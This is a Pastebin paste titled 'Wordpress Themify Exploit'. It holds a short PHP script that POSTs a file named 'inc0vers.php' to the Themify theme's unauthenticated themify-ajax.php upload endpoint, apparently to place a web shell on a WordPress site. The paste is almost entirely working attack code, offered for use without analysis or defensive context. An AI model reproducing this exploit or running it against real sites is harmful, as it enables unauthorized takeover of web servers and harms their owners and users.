Advertisement
Jemb0t_IR3eng

Wordpress Themify Exploit

Jan 27th, 2017
654
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. <?php
  2. $uploadfile="inc0vers.php";$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,
  3. array('Filedata'=>"@$uploadfile"));
  4. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);
  5. curl_close($ch);
  6. print "$postResult";?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement